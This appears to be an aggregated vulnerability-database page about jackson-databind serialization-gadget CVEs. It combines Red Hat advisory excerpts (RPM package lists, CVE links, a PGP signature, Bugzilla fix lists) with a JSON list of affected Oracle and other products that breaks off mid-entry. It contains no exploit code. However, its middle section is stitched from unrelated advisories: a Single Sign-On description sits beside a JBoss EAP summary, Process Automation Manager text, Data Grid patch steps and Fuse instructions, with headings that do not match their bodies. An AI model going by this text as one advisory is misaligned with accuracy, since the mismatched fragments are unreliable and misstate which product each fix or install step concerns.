tfm-rubygem-rack-jsonp-1.3.1-9.el7sat.noarch.rpm tfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm tfm-rubygem-rack-test-1.1.0-4.el7sat.noarch.rpm tfm-rubygem-rails-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-rails-dom-testing-2.0.3-6.el7sat.noarch.rpm tfm-rubygem-rails-html-sanitizer-1.3.0-1.el7sat.noarch.rpm tfm-rubygem-rails-i18n-6.0.0-2.el7sat.noarch.rpm tfm-rubygem-railties-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-rainbow-2.2.1-5.el7sat.noarch.rpm tfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm tfm-rubygem-rbovirt-0.1.7-4.el7sat.noarch.rpm tfm-rubygem-rbvmomi-2.2.0-3.el7sat.noarch.rpm tfm-rubygem-record_tag_helper-1.0.1-3.el7sat.noarch.rpm tfm-rubygem-recursive-open-struct-1.1.0-1.el7sat.noarch.rpm tfm-rubygem-redhat_access-2.2.18-1.el7sat.noarch.rpm tfm-rubygem-redhat_access_lib-1.1.5-1.el7sat.noarch.rpm tfm-rubygem-redis-4.1.2-2.el7sat.noarch.rpm tfm-rubygem-representable-3.0.4-1.el7sat.noarch.rpm tfm-rubygem-responders-3.0.0-3.el7sat.noarch.rpm tfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm tfm-rubygem-retriable-3.1.2-1.el7sat.noarch.rpm tfm-rubygem-roadie-3.4.0-3.el7sat.noarch.rpm tfm-rubygem-roadie-rails-2.1.1-2.el7sat.noarch.rpm tfm-rubygem-robotex-1.0.0-21.el7sat.noarch.rpm tfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm tfm-rubygem-ruby2ruby-2.4.2-3.el7sat.noarch.rpm tfm-rubygem-ruby_parser-3.10.1-2.el7sat.noarch.rpm tfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm tfm-rubygem-runcible-2.13.0-2.el7sat.noarch.rpm tfm-rubygem-safemode-1.3.5-2.el7sat.noarch.rpm tfm-rubygem-scoped_search-4.1.9-1.el7sat.noarch.rpm tfm-rubygem-secure_headers-6.3.0-2.el7sat.noarch.rpm tfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm tfm-rubygem-sexp_processor-4.10.0-5.el7sat.noarch.rpm tfm-rubygem-sidekiq-5.2.7-3.el7sat.noarch.rpm tfm-rubygem-signet-0.11.0-3.el7sat.noarch.rpm tfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm tfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm tfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm tfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm tfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm tfm-rubygem-sprockets-3.7.2-6.el7sat.noarch.rpm tfm-rubygem-sprockets-rails-3.2.1-6.el7sat.noarch.rpm tfm-rubygem-sshkey-1.9.0-3.el7sat.noarch.rpm tfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm tfm-rubygem-stomp-1.4.9-1.el7sat.noarch.rpm tfm-rubygem-text-1.3.0-7.el7sat.noarch.rpm tfm-rubygem-thor-1.0.1-2.el7sat.noarch.rpm tfm-rubygem-thread_safe-0.3.6-5.el7sat.noarch.rpm tfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm tfm-rubygem-timeliness-0.3.10-1.el7sat.noarch.rpm tfm-rubygem-tzinfo-1.2.6-1.el7sat.noarch.rpm tfm-rubygem-uber-0.1.0-1.el7sat.noarch.rpm tfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm tfm-rubygem-unicode-display_width-1.0.5-5.el7sat.noarch.rpm tfm-rubygem-validates_lengths_from_database-0.5.0-7.el7sat.noarch.rpm tfm-rubygem-webpack-rails-0.9.8-6.el7sat.noarch.rpm tfm-rubygem-websocket-extensions-0.1.5-1.el7sat.noarch.rpm tfm-rubygem-will_paginate-3.1.7-3.el7sat.noarch.rpm tfm-rubygem-x-editable-rails-1.5.5-5.el7sat.noarch.rpm tfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm tfm-rubygem-zeitwerk-2.2.2-1.el7sat.noarch.rpm
x86_64: createrepo_c-0.7.4-1.el7sat.x86_64.rpm createrepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm createrepo_c-libs-0.7.4-1.el7sat.x86_64.rpm foreman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm foreman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm hfsplus-tools-332.14-12.el7.x86_64.rpm hfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm libmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm libmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm libsolv-0.7.4-4.pulp.el7sat.x86_64.rpm libsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm libwebsockets-2.4.2-2.el7.x86_64.rpm libwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm livecd-tools-20.4-1.6.el7sat.x86_64.rpm mod_passenger-4.0.18-24.el7sat.x86_64.rpm mod_xsendfile-0.12-11.el7sat.x86_64.rpm mod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm ostree-2017.1-2.atomic.el7.x86_64.rpm ostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm pcp-mmvstatsd-0.4-2.el7sat.x86_64.rpm puppet-agent-6.14.0-2.el7sat.x86_64.rpm pycairo-1.16.3-9.el7sat.x86_64.rpm pycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm pygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm python-aiohttp-debuginfo-3.6.2-4.el7ar.x86_64.rpm python-billiard-debuginfo-3.5.0.3-3.el7sat.x86_64.rpm python-bson-3.2-2.el7sat.x86_64.rpm python-imgcreate-20.4-1.6.el7sat.x86_64.rpm python-markupsafe-debuginfo-0.23-21.el7sat.x86_64.rpm python-multidict-debuginfo-4.7.4-2.el7ar.x86_64.rpm python-psutil-5.0.1-3.el7sat.x86_64.rpm python-psutil-debuginfo-5.0.1-3.el7sat.x86_64.rpm python-pycurl-debuginfo-7.43.0.2-4.el7sat.x86_64.rpm python-pymongo-3.2-2.el7sat.x86_64.rpm python-pymongo-debuginfo-3.2-2.el7sat.x86_64.rpm python-pymongo-gridfs-3.2-2.el7sat.x86_64.rpm python-qpid-proton-0.28.0-3.el7.x86_64.rpm python-qpid-qmf-1.36.0-28.el7amq.x86_64.rpm python-saslwrapper-0.22-5.el7sat.x86_64.rpm python-simplejson-3.2.0-1.el7sat.x86_64.rpm python-simplejson-debuginfo-3.2.0-1.el7sat.x86_64.rpm python-twisted-debuginfo-16.4.1-12.el7sat.x86_64.rpm python-yarl-debuginfo-1.4.2-2.el7ar.x86_64.rpm python-zope-interface-4.0.5-4.el7.x86_64.rpm python-zope-interface-debuginfo-4.0.5-4.el7.x86_64.rpm python2-billiard-3.5.0.3-3.el7sat.x86_64.rpm python2-gobject-3.28.3-2.el7sat.x86_64.rpm python2-gobject-base-3.28.3-2.el7sat.x86_64.rpm python2-markupsafe-0.23-21.el7sat.x86_64.rpm python2-pycurl-7.43.0.2-4.el7sat.x86_64.rpm python2-solv-0.7.4-4.pulp.el7sat.x86_64.rpm python2-twisted-16.4.1-12.el7sat.x86_64.rpm python3-aiohttp-3.6.2-4.el7ar.x86_64.rpm python3-multidict-4.7.4-2.el7ar.x86_64.rpm python3-yarl-1.4.2-2.el7ar.x86_64.rpm qpid-cpp-client-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-client-devel-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-debuginfo-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-server-1.36.0-28.el7amq.x86_64.rpm qpid-cpp-server-linearstore-1.36.0-28.el7amq.x86_64.rpm qpid-dispatch-debuginfo-1.5.0-4.el7.x86_64.rpm qpid-dispatch-router-1.5.0-4.el7.x86_64.rpm qpid-proton-c-0.28.0-3.el7.x86_64.rpm qpid-proton-debuginfo-0.28.0-3.el7.x86_64.rpm qpid-qmf-1.36.0-28.el7amq.x86_64.rpm rh-postgresql12-postgresql-evr-0.0.2-1.el7sat.x86_64.rpm rubygem-facter-2.4.1-2.el7sat.x86_64.rpm rubygem-newt-0.9.6-3.el7sat.x86_64.rpm rubygem-newt-debuginfo-0.9.6-3.el7sat.x86_64.rpm rubygem-passenger-4.0.18-24.el7sat.x86_64.rpm rubygem-passenger-debuginfo-4.0.18-24.el7sat.x86_64.rpm rubygem-passenger-native-4.0.18-24.el7sat.x86_64.rpm rubygem-passenger-native-libs-4.0.18-24.el7sat.x86_64.rpm saslwrapper-0.22-5.el7sat.x86_64.rpm saslwrapper-debuginfo-0.22-5.el7sat.x86_64.rpm tfm-rubygem-bcrypt-3.1.12-1.el7sat.x86_64.rpm tfm-rubygem-bcrypt-debuginfo-3.1.12-1.el7sat.x86_64.rpm tfm-rubygem-facter-2.4.0-6.el7sat.x86_64.rpm tfm-rubygem-ffi-1.12.2-1.el7sat.x86_64.rpm tfm-rubygem-ffi-debuginfo-1.12.2-1.el7sat.x86_64.rpm tfm-rubygem-http_parser.rb-0.6.0-1.el7sat.x86_64.rpm tfm-rubygem-http_parser.rb-debuginfo-0.6.0-1.el7sat.x86_64.rpm tfm-rubygem-journald-native-1.0.11-2.el7sat.x86_64.rpm tfm-rubygem-journald-native-debuginfo-1.0.11-2.el7sat.x86_64.rpm tfm-rubygem-nio4r-2.5.2-2.el7sat.x86_64.rpm tfm-rubygem-nio4r-debuginfo-2.5.2-2.el7sat.x86_64.rpm tfm-rubygem-nokogiri-1.10.9-1.el7sat.x86_64.rpm tfm-rubygem-nokogiri-debuginfo-1.10.9-1.el7sat.x86_64.rpm tfm-rubygem-ovirt-engine-sdk-4.2.3-3.el7sat.x86_64.rpm tfm-rubygem-ovirt-engine-sdk-debuginfo-4.2.3-3.el7sat.x86_64.rpm tfm-rubygem-passenger-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-passenger-debuginfo-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-passenger-native-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-passenger-native-libs-4.0.18-26.el7sat.x86_64.rpm tfm-rubygem-pg-1.1.4-2.el7sat.x86_64.rpm tfm-rubygem-pg-debuginfo-1.1.4-2.el7sat.x86_64.rpm tfm-rubygem-puma-4.3.3-4.el7sat.x86_64.rpm tfm-rubygem-puma-debuginfo-4.3.3-4.el7sat.x86_64.rpm tfm-rubygem-rkerberos-0.1.5-18.el7sat.x86_64.rpm tfm-rubygem-rkerberos-debuginfo-0.1.5-18.el7sat.x86_64.rpm tfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.x86_64.rpm tfm-rubygem-ruby-libvirt-debuginfo-0.7.0-4.el7sat.x86_64.rpm tfm-rubygem-sqlite3-1.3.13-5.el7sat.x86_64.rpm tfm-rubygem-sqlite3-debuginfo-1.3.13-5.el7sat.x86_64.rpm tfm-rubygem-unf_ext-0.0.7.2-1.el7sat.x86_64.rpm tfm-rubygem-unf_ext-debuginfo-0.0.7.2-1.el7sat.x86_64.rpm tfm-rubygem-unicode-0.4.4.4-1.el7sat.x86_64.rpm tfm-rubygem-unicode-debuginfo-0.4.4.4-1.el7sat.x86_64.rpm tfm-rubygem-websocket-driver-0.7.1-1.el7sat.x86_64.rpm tfm-rubygem-websocket-driver-debuginfo-0.7.1-1.el7sat.x86_64.rpm tfm-runtime-6.1-1.el7sat.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2018-3258 https://access.redhat.com/security/cve/CVE-2018-11751 https://access.redhat.com/security/cve/CVE-2019-12781 https://access.redhat.com/security/cve/CVE-2019-16782 https://access.redhat.com/security/cve/CVE-2020-5216 https://access.redhat.com/security/cve/CVE-2020-5217 https://access.redhat.com/security/cve/CVE-2020-5267 https://access.redhat.com/security/cve/CVE-2020-7238 https://access.redhat.com/security/cve/CVE-2020-7663 https://access.redhat.com/security/cve/CVE-2020-7942 https://access.redhat.com/security/cve/CVE-2020-7943 https://access.redhat.com/security/cve/CVE-2020-8161 https://access.redhat.com/security/cve/CVE-2020-8184 https://access.redhat.com/security/cve/CVE-2020-8840 https://access.redhat.com/security/cve/CVE-2020-9546 https://access.redhat.com/security/cve/CVE-2020-9547 https://access.redhat.com/security/cve/CVE-2020-9548 https://access.redhat.com/security/cve/CVE-2020-10693 https://access.redhat.com/security/cve/CVE-2020-10968 https://access.redhat.com/security/cve/CVE-2020-10969 https://access.redhat.com/security/cve/CVE-2020-11619 https://access.redhat.com/security/cve/CVE-2020-14061 https://access.redhat.com/security/cve/CVE-2020-14062 https://access.redhat.com/security/cve/CVE-2020-14195 https://access.redhat.com/security/cve/CVE-2020-14334 https://access.redhat.com/security/cve/CVE-2020-14380 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBX5gpEdzjgjWX9erEAQgmXRAAjIzb5ngtDgGHNv75R+NwkGD3jzRe/GfK 1DDrOBxGaminKY9q+hGwwJOGrMbr2gcfu+VtuFgUTaxFjbfml6Lsju9czOPSL+Wa 5vIcvaUObLQEwmW5hP7ZIqzZvm0UlbSgHEsv7tYwIWkITIg54p2fQzRUuSH8nRhr oomd60Mv8Ayv6IdogtiNDdv8B7avsNQrbtzf60HGtyZlX8Rro2Wy8gosbfsGl10f Z8Nc+tVwWdkdpFjcMtwmYIDtecgwxMmo3FMJRtkSrQ2VldZB9mjFj/WyfZOfV3Io OhoAiLFzi52dC68an5/VFnzZWxdOmYjqm4rBZ2MLnw/wn4jH2WOgjK5VBJUW+nmX k9pQLGrKlLQeYSVY9Je9Maxz1POajFEV1u+ByAVDBm1xBJMhlTEcTwbHt1X0jLzG C2CSzCY8Urz2j1SvYrcrBdNGSqK1wvMwDL7V7lEpaFd/dGE+JwbrOB6z2iYr3de5 /6nh/jeWFi16C0Z8FbYe021edVuzbzCITbz+UdThAITmROcE7Q6ysDPcvToANfta D2gChuqVhmTWJ9YDeQTWiErQLY4OJfklPd/5L/sIZqoZpV8B+5bTHTKsCiisyj1a f4PVZiu+CQoxHuj45rTwRLLfP9+SmJpFz+JsId6rKQ2hrzZ4DzB9srzyewd2TfvG 1yK/tAm1KBU=osSG -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
NOTE: This advisory is an addendum to https://access.redhat.com/errata/RHBA-2020:1414 and is an informational advisory only, to clarify security fixes released therein. No code has been modified as part of this advisory. Description:
Red Hat Single Sign-On 7.4 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. Summary:
This is a security update for JBoss EAP Continuous Delivery 19. JIRA issues fixed (https://issues.jboss.org/):
JBEAP-18881 - Upgrade Undertow to 2.0.30.SP1 JBEAP-18974 - Upgrade snakeyaml to 1.26 JBEAP-18975 - Upgrade cryptacular to 1.2.4 JBEAP-18982 - Upgrade WildFly Core to 11.0.0.Final-redhat-00001 JBEAP-18983 - Upgrade Remoting JMX from 3.0.3 to 3.0.4 JBEAP-19041 - Upgrade WildFly Elytron to 1.11.3.Final JBEAP-19042 - Upgrade wildfly-core to 11.0.2.Final JBEAP-19076 - Upgrade resteasy from 3.11.0.Final to 3.11.1.Final JBEAP-19211 - Empty section Fixed CVEs in CD19 Release Notes
- Description:
Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services. Solution:
To install this update, do the following:
- Download the Data Grid 7.3.7 server patch from the customer portal. Back up your existing Data Grid installation. You should back up databases, configuration files, and so on. Install the Data Grid 7.3.7 server patch. Refer to the 7.3 Release Notes for patching instructions. Restart Data Grid to ensure the changes take effect. Bugs fixed (https://bugzilla.redhat.com/):
1595621 - CVE-2017-7658 jetty: Incorrect header handling 1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720 1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class 1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass 1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230 1796617 - CVE-2020-1719 Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain 1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability 1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain 1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1816216 - CVE-2020-11612 netty: compression/decompression codecs don't enforce limits on buffer allocation sizes 1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking 1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config 1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap 1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core 1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider 1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane 1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory 1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider 1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime 1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication 1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly 1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop 1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender
- The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Installation instructions are available from the Fuse 7.7.0 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/
- Bugs fixed (https://bugzilla.redhat.com/):
1343616 - CVE-2016-4970 netty: Infinite loop vulnerability when handling renegotiation using SslProvider.OpenSsl 1620529 - CVE-2018-1000632 dom4j: XML Injection in Class: Element. Methods: addElement, addAttribute which can impact the integrity of XML documents 1632452 - CVE-2018-3831 elasticsearch: Information exposure via _cluster/settings API 1637492 - CVE-2018-11797 pdfbox: unbounded computation in parser resulting in a denial of service 1638391 - CVE-2018-12541 vertx: WebSocket HTTP upgrade implementation holds the entire http request in memory before the handshake 1697598 - CVE-2019-3797 spring-data-jpa: Additional information exposure with Spring Data JPA derived queries 1700016 - CVE-2019-0231 mina-core: Retaining an open socket in close_notify SSL-TLS leading to Information disclosure. 1713468 - CVE-2019-12086 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server. 7) - noarch
- Description:
The jackson-databind package provides general data-binding functionality for Jackson, which works on top of Jackson core streaming API.
Security Fix(es):
-
jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider (CVE-2020-10968)
-
jackson-databind: Serialization gadgets in javax.swing.JEditorPane (CVE-2020-10969)
-
jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory (CVE-2020-11111)
-
jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider (CVE-2020-11112)
-
jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime (CVE-2020-11113)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):
1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider 1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane 1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory 1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider 1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime
6
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.3"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "communications evolved communications application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.1"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "retail sales audit",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.0.15"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "global lifecycle management opatch",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0.1.20"
},
{
"_id": null,
"model": "retail merchandising system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.9.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.1"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.10.4"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "communications instant messaging server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.0.1.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.2"
},
{
"_id": null,
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications session report manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "jd edwards enterpriseone orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.0.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.0.2.25"
},
{
"_id": null,
"model": "agile plm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.3.6"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.2"
},
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.5.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.7"
},
{
"_id": null,
"model": "autovue for agile product lifecycle management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.2"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0.1"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.0"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "financial services retail customer analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.0"
},
{
"_id": null,
"model": "communications calendar server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.3"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "eq",
